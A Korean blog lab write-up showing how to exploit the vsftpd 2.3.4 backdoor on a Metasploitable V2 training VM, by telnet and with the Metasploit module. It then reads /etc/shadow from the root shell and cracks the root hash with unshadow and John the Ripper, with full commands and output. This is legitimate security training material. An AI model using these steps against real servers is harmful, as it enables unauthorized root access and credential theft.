Metasploitable V2 Linux 서버의 취약점(Backdoor)

(3) 버그를 공격하는 경우(Backdoor 존재하는 취약점)

■ 실습 시스템

- linux200 (EX: attacker system)

- KaliLinux(EX: attacker system)

- Metasploitable V2 Linux (EX: victim system)

■ 공격의 개요

Meta V2는 오픈소스이다. (해커의 원본파일 손상 및 재배포)

VSFTPD BUG

If a username is sent that ends in the sequence ":)" [ a happy face ], the backdoored version

will open a listening shell on port 6200.

■ 취약점 공격 과정(Backdoor 존재하는 취약점)

(linux200)

① vsftpd 서비스 버전 확인

# nmap -sV -p 21 192.168.10.0/24

Interesting ports on 192.168.10.2:

PORT STATE SERVICE VERSION

21/tcp closed ftp

Interesting ports on 192.168.10.50:

PORT STATE SERVICE VERSION

21/tcp closed ftp

....

Interesting ports on 192.168.10.134:

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

Service Info: OS: Unix

-> 백도어가 설치된 버전이다.

-> vsftpd 데몬이 21/tcp 사용하고 있다.

② vsftpd 서버로 접속하여 백도어를 동작 시킴

# telnet 192.168.10.134 21

Trying 192.168.10.134...

Connected to 192.168.10.134 (192.168.10.134).

Escape character is '^]'.

220 (vsFTPd 2.3.4)

user backdoored:)

331 Please specify the password.

pass invalid

^] (ctrl + ])

telnet> quit

Connection closed.

③ 백도어 포트(6200)로 telnet 접속 하기

# telnet 192.168.10.134 6200

Trying 192.168.10.134...

Connected to 192.168.10.134 (192.168.10.134).

Escape character is '^]'.

id;

uid=0(root) gid=0(root)

: command not found

pwd;

: command not found

hostname;

metasploitable

: command not found

cat /etc/passwd;

..... (중략) ....

user:x:1001:1001:just a user,111,,:/home/user:/bin/bash

service:x:1002:1002:,,,:/home/service:/bin/bash

telnetd:x:112:120::/nonexistent:/bin/false

proftpd:x:113:65534::/var/run/proftpd:/bin/false

statd:x:114:65534::/var/lib/nfs:/bin/false

snmp:x:115:65534::/var/lib/snmp:/bin/false

user1:x:1003:1003::/home/user1:/bin/bash

: command not found

exit;

Connection closed by foreign host.

root[~]# telnet 192.168.10.134 6200

Trying 192.168.10.134...

telnet: connect to address 192.168.10.134: Connection refused

telnet: Unable to connect to remote host: Connection refused

-> 접속이 해제되고 나서는 다시 :) (happy face) 작업을 진행한 한 6200 포트로 telnet을 사용하여야 한다.

(KaliLinux)

④ msfconsole 통해 공격해 보자.

# msfconsole -q

msf > search vsftpd

Matching Modules

================

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 21 yes The target port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.10.134

RHOST => 192.168.10.134

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[+] Backdoor service has been spawned, handling...

[+] UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (192.168.10.50:43071 -> 192.168.10.134:6200) at 2016-04-05 13:43:04 +0900

uid=0(root) gid=0(root)

hostname

metasploitable

grep root /etc/passwd

root:x:0:0:root:/root:/bin/bash <--- 이 라인을 복사

grep root /etc/shadow

root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:16896:0:99999:7::: <--- 이 라인을 복사

Abort session 1? [y/N] y

msf exploit(vsftpd_234_backdoor) > exit

grep root /etc/passwd

root:x:0:0:root:/root:/bin/bash

grep root /etc/shadow

root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7:::

옛날 방식

root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7::::0:0:root:/root:/bin/bash

⑤ "④"번에서 얻은 암호를 가지고 암호 클랙(password crack) 작업을 수행 해 보자.

(선수작업) metasploitable V2 Linux 에서

$ sudo su -

# passwd root

-> 암호를 soldesk1. 설정

# exit

$ exit

# cd /root/bin

# vi pass1.txt

root:x:0:0:root:/root:/bin/bash

# vi pass2.txt

root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:16896:0:99999:7:::

# unshadow pass1.txt pass2.txt > crack.txt

# cat crack.txt

root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:0:0:root:/root:/bin/bash

# vi wordlist.txt

administrator

admin

soldesk1.

# john --wordlist=wordlist.txt crack.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"

Use the "--format=aix-smd5" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 XOP 4x2])

Press 'q' or Ctrl-C to abort, almost any other key for status

soldesk1. (root)

1g 0:00:00:00 DONE (2016-04-05 14:02) 12.50g/s 37.50p/s 37.50c/s 37.50C/s administrator..soldesk1.

Use the "--show" option to display all of the cracked passwords reliably

Session completed

# john --show crack.txt

root:soldesk1.:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left

john 은 옛날 방식이라

/etc/passwd 의 2번째 필드에 shadow 파일을 넣어야 사용할 수 있다.

root:x:0:0:root:/root:/bin/bash

grep root /etc/shadow

root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7:::

# unshadow /etc/passwd /etc/shadow

root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7::::0:0:root:/root:/bin/bash

저작자표시 비영리 변경금지

'Learning > └◆Metasploit' 카테고리의 다른 글

Metasploitable V2 Linux 서버의 취약점(distccd,samba) (0)	2017.01.10
Metasploitable V2 Linux 서버의 취약점(IRC) (0)	2017.01.10
Metasploitable V2 Linux 서버의 취약점(NFS) (0)	2017.01.09
Metasploitable V2 Linux 서버의 취약점(rhosts) (0)	2017.01.09

형진님의 티스토리 블로그

Metasploitable V2 Linux 서버의 취약점(Backdoor)

'Learning > └◆Metasploit' 카테고리의 다른 글

티스토리툴바

Metasploitable V2 Linux 서버의 취약점(Backdoor)

'Learning > └◆Metasploit' 카테고리의 다른 글

'Learning/└◆Metasploit' Related Articles

티스토리툴바